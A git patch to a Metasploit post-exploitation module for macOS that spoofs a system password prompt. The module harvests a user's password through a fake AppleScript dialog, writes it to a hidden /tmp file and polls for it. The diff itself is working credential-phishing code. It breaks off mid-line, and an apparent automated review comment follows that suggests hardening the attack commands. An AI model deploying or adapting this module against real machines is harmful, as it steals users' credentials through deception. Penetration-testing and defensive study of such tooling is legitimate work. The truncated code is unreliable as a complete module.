From 95a98529c4cacc38e2488eb9e74e021786d12b79 Mon Sep 17 00:00:00 2001
From: Peter Toth
Date: Wed, 27 Nov 2013 21:38:20 +0100
Subject: [PATCH] Removed script launcher wrapper and fixed the file_exists so that the module now detects input
---
 .../post/osx/gather/password_prompt_spoof.rb | 86 ++++++++-----------
 1 file changed, 34 insertions(+), 52 deletions(-)
diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb
index 21d2579b9a..7bfa70ee95 100644
--- a/modules/post/osx/gather/password_prompt_spoof.rb
+++ b/modules/post/osx/gather/password_prompt_spoof.rb
@@ -19,7 +19,8 @@ class Metasploit3 < Msf::Post
 'License' => MSF_LICENSE,
 'Author' => [
 'Joff Thyer ', # original post module
- 'joev' # bug fixes
+ 'joev', # bug fixes
+ 'Peter Toth ' # bug fixes
 ],
 'Platform' => [ 'osx' ],
 'References' => [
@@ -79,29 +80,23 @@ class Metasploit3 < Msf::Post print_status("Running module against #{host}") dir = "/tmp/." + Rex::Text.rand_text_alpha((rand(8)+6)) - runme = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) creds_osa = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) - creds = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) pass_file = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6)) username = cmd_exec("/usr/bin/whoami").strip cmd_exec("umask 0077") cmd_exec("/bin/mkdir #{dir}") - # write the script that will launch things - write_file(runme, run_script) - cmd_exec("/bin/chmod 700 #{runme}") - - # write the credentials script, compile and run + # write the credentials script and run write_file(creds_osa,creds_script(pass_file)) - cmd_exec("/usr/bin/osacompile -o #{creds} #{creds_osa}") - cmd_exec("#{runme} #{creds}") + cmd_exec("cat #{creds_osa} | osascript") + print_status("Waiting for user '#{username}' to enter credentials...") timeout = ::Time.now.to_f + datastore['TIMEOUT'].to_i pass_found = false while (::Time.now.to_f < timeout) - if ::File.exist?(pass_file) + if file_exist?(pass_file) print_status("Password entered! What a nice compliant user...") pass_found = true break @@ -122,51 +117,38 @@ class Metasploit3 < Msf::Post cmd_exec("/usr/bin/srm -rf #{dir}") end - # "wraps" the #creds_script applescript and allows it to make UI calls - def run_script - %Q{ - #!/bin/bash - osascript <
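Review bot: In the `@@ -79,29 +80,23 @@` hunk, the added `cmd_exec("cat #{creds_osa} | osascript")` resolves `cat` and `osascript` through the session's PATH, while the other commands in the same method are pinned to absolute paths (`/usr/bin/whoami`, `/bin/mkdir`, `/usr/bin/srm`). For consistency, and so that the binary that runs is predictable, I would write `cmd_exec("/bin/cat #{creds_osa} | /usr/bin/osascript")`. The removed `run_script` wrapper carried a comment explaining that it let the AppleScript make UI calls; the new comment `# write the credentials script and run` no longer says why the script is fed on stdin rather than passed as a file argument, so a short why-comment on that line would help the next maintainer. The enclosing method starts before and ends after this hunk, so the rest of the polling loop and the cleanup are not reviewed here.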